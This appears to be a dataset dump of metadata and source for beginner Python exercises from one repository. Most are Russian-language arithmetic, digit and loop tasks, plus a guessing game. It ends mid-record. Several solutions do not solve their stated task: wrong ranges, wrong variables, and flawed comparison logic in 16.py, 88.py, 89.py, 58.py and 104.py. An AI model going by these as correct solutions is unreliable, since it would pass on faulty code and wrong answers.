"text": "#Даны катеты прямоугольного треугольника. Найдите площадь, периметр и гипотенузу треугольника.\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\n\nc = math.sqrt(a**2 + b**2)\ns = 1/2 * (a*b)\np = a + b + c\n\nprint (s, \"\\t\", c, \"\\t\", p)\n"
},
{
"alpha_fraction": 0.4900990128517151,
"alphanum_fraction": 0.6089109182357788,
"avg_line_length": 20.105262756347656,
"blob_id": "45e9c18b006c04ffbea95ae1ed5dc04a5b81134a",
"content_id": "9b207320c24a7bdbe11f054ec4888ab6c8f27f77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 487,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 19,
"path": "/Practic/Tasks/59.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число.\n# Верно ли, что цифр в нем расположены по убыванию?\n# Например, 4311 - нет, 4321 - да, 5542 - нет,\n# 5631 - нет, 9871 - да.\n\nvalue = int(input(\"Value:\"))\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\n\nif digit_2 == digit_1-1 and digit_3 == digit_2-1 and digit_4 == digit_3-1:\n\n print(\"Yes\")\n\nelse:\n print(\"No\")\n\n\n\n"
},
{
"alpha_fraction": 0.4580152630805969,
"alphanum_fraction": 0.572519063949585,
"avg_line_length": 13.44444465637207,
"blob_id": "3bec048d07366468b9e51c21a1475cae328e5543",
"content_id": "28e26919c232fe69f284f023a5448487346dfc5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/Practic/Tasks/87.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 10+11+12+13+...+88. Материал сайта www.itmathrepetitor.ru\n\ni = 9\nn = 0\n\nwhile i < 88:\n i += 1\n n += i\nprint(n)\n\n"
},
{
"alpha_fraction": 0.43981480598449707,
"alphanum_fraction": 0.5787037014961243,
"avg_line_length": 34.83333206176758,
"blob_id": "7efd8409d09b3203dc7c79bf1b951dda9e9e6017",
"content_id": "b40fc0b0fbaa47881542aaf92b3896bd58ab4493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/Practic/Tasks/11.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения |x−5|−sinx3+x2+2014−−−−−−−−√cos2x−3 при x=−2.34. Ответ: -1.76911\nimport math\n\nx = -2.34\n\nprint( ( (math.fabs(x-5) - math.sin(x))/3 ) + ( math.sqrt(x**2 + 2014)) * math.cos(2 * x) - 3 )\n\n"
},
{
"alpha_fraction": 0.5281898975372314,
"alphanum_fraction": 0.5548961162567139,
"avg_line_length": 16.63157844543457,
"blob_id": "22ccfd04e6fd591ce9f0c48c98a968a1e69efb87",
"content_id": "5f54159af7aa809ed11a7a96100816e47216afa0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 19,
"path": "/Practic/Tasks/46.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Найти сумму тех чисел, которые делятся на 5. Если таких чисел нет, то вывести error.\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nsumm = 0\n\nif x % 5 == 0:\n summ += x\nif y % 5 == 0:\n summ += y\nif z % 5 == 0:\n summ += z\n\nif summ == 0:\n print(\"error\")\nelse:\n print(summ)\n\n\n"
},
{
"alpha_fraction": 0.554430365562439,
"alphanum_fraction": 0.5848101377487183,
"avg_line_length": 17.809524536132812,
"blob_id": "b3b4e02ab2bab56a07ee856b6e8362daa02837cd",
"content_id": "b4fe34701b51bd9ffac3e01e383f925f242f9fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/Practic/Tasks/58.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано две даты, каждая из которых состоит из трех чисел\n# (день, месяц и год). Вывести yes,\n# если первая дата раньше второй, иначе вывести no.\n\nd = int(input(\"d:\"))\nm = int(input(\"m:\"))\ny = int(input(\"y:\"))\n\nd1 = int(input(\"d1:\"))\nm1 = int(input(\"m1:\"))\ny1 = int(input(\"y1:\"))\n\nif y > y1:\n print(d,m,y)\nelif m > m1:\n print(d,m,y)\nelif d > d1:\n print(d,m,y)\n\nelse:\n print(d1,m1,y1)\n"
},
{
"alpha_fraction": 0.6713286638259888,
"alphanum_fraction": 0.6853147149085999,
"avg_line_length": 9.214285850524902,
"blob_id": "216347831f4e4290027fd18c9f31fdd8b41e115d",
"content_id": "117314fe2bf0ffca4a1e6a184b0bb2e54d6c2509",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 14,
"path": "/Practic/Tasks/26.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны две переменных с некоторыми значениями.\n# Поменять местами значения этих переменных\n\na = 3\n\nb = 5\n\nbuff = a\n\na = b\n\nb = buff\n\nprint(a,b)\n"
},
{
"alpha_fraction": 0.5358090400695801,
"alphanum_fraction": 0.6259946823120117,
"avg_line_length": 25.928571701049805,
"blob_id": "1c388d94f28b118e5d72345860a2fce3b1c32a81",
"content_id": "802ae68fb187db90bb51e3e997791ee4c3dda0a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 14,
"path": "/Practic/Tasks/42.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно от 2 до 5 включительно, то увеличить его на 10. Если оно от 7 до 40, то уменьшить на 100. Если оно не более 0 или более 3000, то увеличить в 3 раза (то есть умножить на 3). Иначе занулить это число.\n\n\nx = int(input(\"x:\"))\n\nif 2 <= x <= 5:\n print(x+10)\nelif 7 < x < 40:\n print(x-100)\nelif x < 0 or x > 3000:\n print(x*3)\nelse:\n x=0\n print(x)\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.7041666507720947,
"avg_line_length": 23,
"blob_id": "d748def0b948d47da24b9575ee5c03d29113315b",
"content_id": "df995d016e2b7a3e8c0702845cf89fdb6348e154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 376,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/Practic/Tasks/32.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Из трехзначного числа x вычли его последнюю цифру.\n#Когда результат разделили на 10, # а к частному слева\n# приписали последнюю цифру числа x, то получилось число 237.\n#Найти число x.\n\nx = 237 // 100\nc = 237 % 100 * 10\ns = c + x\n\nprint(s)\n"
},
{
"alpha_fraction": 0.5988371968269348,
"alphanum_fraction": 0.6337209343910217,
"avg_line_length": 18.11111068725586,
"blob_id": "a6249bd6c831bf2752d3d5de070aeac2a70d9574",
"content_id": "92ec1d441d38949c04e206032abbad5329aed7b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 9,
"path": "/Practic/Tasks/20.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит время в минутах и расстояние в километрах. Найдите скорость в м/c.\nt = int(input(\"t:\"))\ns = int(input(\"s:\"))\n\nt = t / 60\n\ns = s /1000\n\nprint(\"V:\",s/t)\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 21.66666603088379,
"blob_id": "3b02b7f036933d47fdd295a33bbfecf69b2afe98",
"content_id": "b1bfc6a60c7ee02b5b4ae3d121b45b232ca021ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/Practic/Tasks/66.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два трехзначных числа.\n# Получите новое число присоединением\n# второго числа справа к первому без последних\n# цифр у каждого. Например, 123 и 456 Ответ: 1245\n\n\nvalue = int(input(\"Value:\"))\nvalue1 = int(input(\"Value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\ndigit1 = value1 // 100\ndigit2 = value1 // 10 % 10\ndigit3 = value1 % 10\n\nprint(digit_1,digit_2,digit1,digit2)\n"
},
{
"alpha_fraction": 0.3426573574542999,
"alphanum_fraction": 0.3916083872318268,
"avg_line_length": 14.666666984558105,
"blob_id": "0dffb4335242af9fde0e80f12a7f6970e3c64fe9",
"content_id": "2d5494b191644e97c0892cfb7ab74f273bf8e2fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/Practic/codeforces/A. Театральная площадь.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "n, m, a = map(int, input().split(' '))\ni = 0\ns2 = 0\nwhile n * m != s2:\n s2 += a + a\n if n * m <= s2:\n break\n i += 1\nprint(i)\n\n\n"
},
{
"alpha_fraction": 0.6405693888664246,
"alphanum_fraction": 0.6548042893409729,
"avg_line_length": 24.545454025268555,
"blob_id": "32455a0306394968fbcf0812af1a79cfec9f9632",
"content_id": "a836dbc72932c679654dd76a115ff2c868509f25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 11,
"path": "/Practic/Tasks/16.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Увеличьте первое число в два раза, второе числа уменьшите на 3, третье число возведите в квадрат и затем найдите сумму новых трех чисел.\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\na = a * 2\nb = b - 3\nd = c**2\n\nprint(a + b + c)\n"
},
{
"alpha_fraction": 0.4325396716594696,
"alphanum_fraction": 0.511904776096344,
"avg_line_length": 24.200000762939453,
"blob_id": "8ca1b02b11a28766b81af6bc01fd1dafb7bc979e",
"content_id": "56d1ff9b2bff9167cd6612d8d8f10f2695cf12e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 10,
"path": "/Practic/Tasks/105.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите хотя одно натуральное число, которое делится на 11, а при делении на 2, 3, 4, ..., 10 дает в остатке 1\n\ni = 0\nj = 0\n\nfor i in range(1, 20):\n if i % 11 == 0:\n for j in range (2,10):\n if i % j == 1:\n print(i)\n"
},
{
"alpha_fraction": 0.43529412150382996,
"alphanum_fraction": 0.5411764979362488,
"avg_line_length": 11.142857551574707,
"blob_id": "e43be5874591557c3b2c97aeb8ef3aa1ac467666",
"content_id": "0d59bf5c6bb6e9ddbd50f86c904f5f79b0ff21f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 7,
"path": "/Practic/Tasks/88.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти произведение 5⋅6⋅7⋅...⋅13.\n\nn = 1\n\nfor i in range(5, 13):\n n *= i\nprint(n)\n"
},
{
"alpha_fraction": 0.5824176073074341,
"alphanum_fraction": 0.6007326245307922,
"avg_line_length": 21.75,
"blob_id": "831b7f2ee30d1c3a6502c01d36fe3a4b4121b32a",
"content_id": "cfe791a5eb8f6ebd9bd79d44d10e6f317c897de5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 12,
"path": "/Games/guess the number.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\nrezult = random.randint(1,100)\nnumber = 0\n\nwhile number != rezult:\n number = int(input(\"Number:\"))\n if number > rezult:\n print(\"Input less\")\n elif number < rezult:\n print(\"Input more\")\n elif number == rezult:\n print(\"Winnnn\")\n"
},
{
"alpha_fraction": 0.3614457845687866,
"alphanum_fraction": 0.5180723071098328,
"avg_line_length": 15.600000381469727,
"blob_id": "327b93b56e4588678ff63085e491fe6d2795b031",
"content_id": "e6d545200443fb7a258bfc0eb47172948ea55eda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/Practic/Tasks/89.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 1+4+7+11+...+112.\nn = 0\nfor i in range (1, 112):\n n += i\nprint(n)\n"
},
{
"alpha_fraction": 0.37362638115882874,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 26.299999237060547,
"blob_id": "33f3074858cf24f32fbd7cc013a8cb2410e9a3d6",
"content_id": "ce3b32406dfc3f9fe79168f29385bc6802f83b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 340,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 10,
"path": "/Practic/Tasks/104.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Сколько существует четырехзначных чисел, которые в 600 раз больше суммы своих цифр?\nj = 0\nfor i in range (1000, 9999):\n d_1 = i // 1000\n d_2 = i // 100 % 10\n d_3 = i // 10 % 10\n d_4 = i % 10\n j = (d_1 + d_2 + d_3 + d_4) * 600\n if i > j:\n print(i)\n"
},
{
"alpha_fraction": 0.46706587076187134,
"alphanum_fraction": 0.56886225938797,
"avg_line_length": 19.875,
"blob_id": "1f091c7291d418f8c9e79b54c8fb52efbf42dd04",
"content_id": "e93ea3b7a3ad6d33ea20f2001c9db1f6d673c794",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 8,
"path": "/Practic/Tasks/91.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 2/3+3/4+4/5+...+9/10.\nfrom fractions import Fraction\ni = Fraction(2, 3)\ng = 0\nwhile i <= Fraction(9, 10):\n i += Fraction(1, 1)\n g += i\n print(g)\n"
},
{
"alpha_fraction": 0.4457831382751465,
"alphanum_fraction": 0.5542168617248535,
"avg_line_length": 19.75,
"blob_id": "5e25149f26bbd4f894b94bf67fee717110d90f61",
"content_id": "316fbb136d9d2cc096ded32e229cf68699d07b1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/Practic/Tasks/79.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран числа 1, 2, 3, 4, ..., 20.\n\nfor i in range (1,21):\n print(i)\n"
},
{
"alpha_fraction": 0.5568181872367859,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 18.55555534362793,
"blob_id": "432956a4215993c31c74b8ffd57cd33a74969c6b",
"content_id": "119825df720bb470a39d64e46e9edc5bbbc5023e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 9,
"path": "/Practic/Tasks/38.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Вывести yes, если они отличаются на 100, иначе вывести No.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x - 100 == y:\n print(\"Yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.3354037404060364,
"alphanum_fraction": 0.3602484464645386,
"avg_line_length": 11.307692527770996,
"blob_id": "484877141af8eb0174d36f228db85fdeeedff3a1",
"content_id": "b7ccb934a7b9018f2e047dfb08f6f97bafc00d1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 13,
"path": "/Practic/Tasks/109.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран строки вида:\n#*******\n#****\n#*******\n#****\n#*******\n#****\nn = int(input(\"n:\"))\ni=0\nwhile i < n:\n i += 1\n print(\"*\"*7)\n print(\"*\"*4)\n\n"
},
{
"alpha_fraction": 0.517699122428894,
"alphanum_fraction": 0.5486725568771362,
"avg_line_length": 12.29411792755127,
"blob_id": "a7c0c9d5fb13245f68d88302a5f4e66849e43696",
"content_id": "9c336f5707a0da12ed4e7897f221e9cd650a7099",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 17,
"path": "/Practic/Tasks/55.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано три числа.\n#Найти количество положительных чисел среди них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nsumm = 0\n\nif x > 0:\n summ += 1\nif y > 0:\n summ += 1\nif z > 0:\n summ += 1\n\nprint(summ)\n"
},
{
"alpha_fraction": 0.3352601230144501,
"alphanum_fraction": 0.47398844361305237,
"avg_line_length": 33.599998474121094,
"blob_id": "a1b170dde0d9f9d983bf535e2b7ac2f64a616807",
"content_id": "f98c2eda24986d177b6006657ff12e0a068e08f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 5,
"path": "/Practic/Tasks/10.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения (x+1)**2+3*(x+1) при а) x=1.7; б) x=3. Ответ: а) 15.39 б) 28\nx = 1.7\nprint((x + 1) ** 2 + 3 * (x + 1))\nx = 3\nprint((x + 1) ** 2 + 3 * (x + 1))\n"
},
{
"alpha_fraction": 0.5931559205055237,
"alphanum_fraction": 0.6730037927627563,
"avg_line_length": 15.4375,
"blob_id": "cdb13932190ebc609f379fc499568de1165f5e74",
"content_id": "44246faf4beec70b3d4c32e276d170608e530a56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 16,
"path": "/Practic/Tasks/60.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано трехзначное число.\n# Переставьте первую и последнюю цифры.\n\nvalue = int(input(\"value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\nbuff = digit_1\nbuff1 = digit_3\n\ndigit_1 = buff1\ndigit_3 = buff\n\nprint(digit_1,digit_2,digit_3)\n"
},
{
"alpha_fraction": 0.5883978009223938,
"alphanum_fraction": 0.6132596731185913,
"avg_line_length": 16,
"blob_id": "dcad715cc200fd95afb2046f0259aa3107411278",
"content_id": "509701aafb71364fb0119c19b2c4ae9a8c1b819d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 21,
"path": "/Practic/Tasks/27.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три переменные a, b и c.\n# Изменить значения этих переменных так,\n# чтобы в a хранилось значение a+b,\n# в b хранилась разность старых значений c−a,\n# а в c хранилось сумма старых значений a+b+c.\n# Например,a=0, b=2, c=5, тогда новые значения a=2, b=3 и c=7.\n\na = 0\nb = 2\nc = 5\n\nth = a + b + c\no = a + b\ntw = c - a\n\n\na = o\nb = tw\nc = th\n\nprint(a, b,c)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5519125461578369,
"alphanum_fraction": 0.5846994519233704,
"avg_line_length": 19.33333396911621,
"blob_id": "0bd8fdf90f8e0d09aa6a8db025e752adf8f78053",
"content_id": "76ad9a2c3380707d94a9f60e4f8c896859ed39d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 9,
"path": "/Practic/Tasks/53.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Если хотя бы одно из них больше 30, то вывести yes, иначе no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > 30 or y > 30:\n print(\"Yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.43971630930900574,
"alphanum_fraction": 0.5650117993354797,
"avg_line_length": 34.25,
"blob_id": "9ec138a64f621251bb819a85eb884e2d83adf440",
"content_id": "1e3c878b51f8c154d5c376ac1f10614b774a7790",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 476,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 12,
"path": "/Practic/Tasks/100.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что среди цифр нет цифр 5 и цифры 6.\n\nvalue = 999\nwhile value < 9999:\n value += 1\n digit_1 = value // 1000\n digit_2 = value // 100 % 10\n digit_3 = value // 10 % 10\n digit_4 = value % 10\n if digit_1 != 5 and digit_1 != 6 and digit_2 != 5 and digit_2 != 6 and digit_3 != 5 and digit_3 != 6 \\\n and digit_4 != 5 and digit_4 != 6:\n print(value)\n"
},
{
"alpha_fraction": 0.34545454382896423,
"alphanum_fraction": 0.47792208194732666,
"avg_line_length": 31.08333396911621,
"blob_id": "2245e9ea8da3d646c26b1297c684233b4323b401",
"content_id": "a8d2a61c50fb75106e56304f4144543d8827c3f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 12,
"path": "/Practic/Tasks/101.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести все пятизначные числа, которые делятся на 2, у которых средняя цифра нечетная, и сумма всех цифр делится на 4.\n\nfor i in range (10000,99999):\n d_1 = i // 10000\n d_2 = i // 1000 % 10\n d_3 = i // 100 % 10\n d_4 = i // 10 % 10\n d_5 = i % 10\n if i % 2 == 0:\n if d_3 % 2 != 0:\n if (d_1 + d_2 + d_3 + d_4 + d_5) % 4 == 0:\n print(i)\n"
},
{
"alpha_fraction": 0.3877550959587097,
"alphanum_fraction": 0.6122449040412903,
"avg_line_length": 23.5,
"blob_id": "54cc8ec53096e81573bca54397141bd16052e89e",
"content_id": "a8f9aa3b6646a71a1d416ba418c956e3af114210",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 2,
"path": "/Practic/Tasks/7.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите 12+14. Ответ: 0.75.\nprint (1/2 + 1/4)\n"
},
{
"alpha_fraction": 0.5086705088615417,
"alphanum_fraction": 0.5953757166862488,
"avg_line_length": 18.22222137451172,
"blob_id": "4681dbaece1799188731cbf9173af159c0c50317",
"content_id": "f8e2cfad47c62d3f467763d96dd72318e7e30da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 9,
"path": "/Practic/Tasks/41.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно более 100 или менее -100, то занулить, иначе увеличить его на 1.\n\nx = int(input(\"x:\"))\n\nif -100 <= x <= 100:\n print(x+1)\nelse:\n x=0\n print(x)\n"
},
{
"alpha_fraction": 0.5692307949066162,
"alphanum_fraction": 0.5692307949066162,
"avg_line_length": 13.44444465637207,
"blob_id": "bb12a7d4b4231b6c2c6eefbeeb26177ef5d2cb14",
"content_id": "98233b93196369be19fe6ade789264206c0c3fa9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/Practic/Tasks/37.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Вывести наибольшее из них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > y:\n print(x)\nelse:\n print(y)\n"
},
{
"alpha_fraction": 0.5637065768241882,
"alphanum_fraction": 0.5984556078910828,
"avg_line_length": 18.769229888916016,
"blob_id": "306017a441cdb198d5f731bf1dd3f5e19fd96b0b",
"content_id": "84ae253673a051df303c6de11a20eeb42bb16afe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 13,
"path": "/Practic/Tasks/30.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число a. Не пользуясь никакими арифметическими\n# операциями кроме умножения, получите\n# а)a**4 за две операции;\n# б) a**6 за три операции;\n# в) a**15 за пять операций.\n\na = 3\n\nz = a * a * a * a#4\nx = z * a * a#6\nc = x * x * a * a * a#15\n\nprint(z,x,c)\n\n\n"
},
{
"alpha_fraction": 0.5260869860649109,
"alphanum_fraction": 0.6304348111152649,
"avg_line_length": 18.16666603088379,
"blob_id": "3d3dbad475c79010923b8be1a7bf652c6028a9d8",
"content_id": "d57275aece2561d994a086b9f75b108a49a0c8cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 12,
"path": "/Practic/Tasks/90.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму cos3/5+cos5/7+cos7/9+...+cos111/113.\n\nimport math\nfrom fractions import Fraction\n\ni = math.cos(Fraction(3, 5))\ng = 0\n\nwhile i > math.cos(Fraction(111, 113)):\n i += math.cos(Fraction(4, 35))\n g =+ i\n print(g)\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 23,
"blob_id": "9cbd11ed14a7ee3a6984549b254a355f06575608",
"content_id": "da150f8d23a1dc6d1f0f3bfccd596743d0e6264d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 3,
"path": "/Practic/Tasks/1.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран текст Silence is golden.\n\nprint (\"Silence is golden\")\n"
},
{
"alpha_fraction": 0.6310679316520691,
"alphanum_fraction": 0.6796116232872009,
"avg_line_length": 33.33333206176758,
"blob_id": "4f09317771c26c5f5a73ee5c227aacc985aa5353",
"content_id": "d24a6b22237d98f49573d8ee767d92a6d0a7edd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 3,
"path": "/Practic/Tasks/75.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран 10 раз фразу \"You are welcome!\"\nfor i in range (0,10):\n print(\"You are welcome\")\n"
},
{
"alpha_fraction": 0.35087719559669495,
"alphanum_fraction": 0.4649122953414917,
"avg_line_length": 15.285714149475098,
"blob_id": "bce3526ba046b3e77a17f513a8823c07439a97d6",
"content_id": "3c0c004565a8a7e8edbcfcf60b1eabc9b3b069ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/Practic/Tasks/82.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран числа 1.2, 1.4, 1.6, ..., 2.8\n\ni = float (1)\n\nwhile i < 3:\n i += 0.2\n print(\"%.1f\" % i )\n"
},
{
"alpha_fraction": 0.5159574747085571,
"alphanum_fraction": 0.521276593208313,
"avg_line_length": 16.090909957885742,
"blob_id": "b5c2bf69c2790865fe6fd905689088de2406110d",
"content_id": "90087f9d3fce3546403505062bdae0ddc6a11740",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 11,
"path": "/Practic/Tasks/78.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран фигуру из звездочек:\n#*******\n#*******\n#*******\n#*******\n#(квадрат из n строк, в каждой строке n звездочек)\n\nn = int(input(\"n:\"))\n\nfor i in range (0,n):\n print(\"*\"*n)\n"
},
{
"alpha_fraction": 0.5161290168762207,
"alphanum_fraction": 0.5161290168762207,
"avg_line_length": 16.714284896850586,
